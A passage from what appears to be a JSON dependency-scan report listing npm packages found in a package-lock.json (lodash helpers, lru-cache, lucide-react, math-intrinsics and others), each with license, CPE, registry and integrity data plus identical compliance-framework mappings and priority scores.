"/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isplainobject@4.0.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", "integrity": "sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1ec5aad22a5b316a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.isstring 4.0.1", "title": "lodash.isstring 4.0.1", "description": "Package discovered: lodash.isstring 4.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f161741909d3d58f", "name": "lodash.isstring", "version": "4.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.isstring@4.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz", "integrity": "sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7962026049b4f49e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lodash.once 4.1.1", "title": "lodash.once 4.1.1", "description": "Package discovered: lodash.once 4.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f5ead8ead936acd7", "name": "lodash.once", "version": "4.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lodash.once@4.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", "integrity": "sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cf9c5c396fa8379f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: long 5.3.2", "title": "long 5.3.2", "description": "Package discovered: long 5.3.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "22165934193ce3c8", "name": "long", "version": "5.3.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/long@5.3.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz", "integrity": "sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4615c5000eb45f3d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: loose-envify 1.4.0", "title": "loose-envify 1.4.0", "description": "Package discovered: loose-envify 1.4.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "01ac139389c8bf08", "name": "loose-envify", "version": "1.4.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/loose-envify@1.4.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", "dependencies": { "js-tokens": "^3.0.0 || ^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8bf9ffa72cfbe889", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lru-cache 10.4.3", "title": "lru-cache 10.4.3", "description": "Package discovered: lru-cache 10.4.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "d68cb2f643232396", "name": "lru-cache", "version": "10.4.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/lru-cache@10.4.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a08719993444a9bd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lru-cache 6.0.0", "title": "lru-cache 6.0.0", "description": "Package discovered: lru-cache 6.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3a3d54b6437f39f3", "name": "lru-cache", "version": "6.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/lru-cache@6.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", "dependencies": { "yallist": "^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fb9befbc81581725", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lru-memoizer 2.3.0", "title": "lru-memoizer 2.3.0", "description": "Package discovered: lru-memoizer 2.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "adf63f866928cf12", "name": "lru-memoizer", "version": "2.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lru-memoizer@2.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz", "integrity": "sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug==", "dependencies": { "lodash.clonedeep": "^4.5.0", "lru-cache": "6.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "03f163b26dd00375", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lucide-react 0.376.0", "title": "lucide-react 0.376.0", "description": "Package discovered: lucide-react 0.376.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9a372e50af0fe0ae", "name": "lucide-react", "version": "0.376.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lucide-react@0.376.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz", "integrity": "sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0f65ff516206127f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: math-intrinsics 1.1.0", "title": "math-intrinsics 1.1.0", "description": "Package discovered: math-intrinsics 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "87a83232f7674dbc", "name": "math-intrinsics", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/math-intrinsics@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", 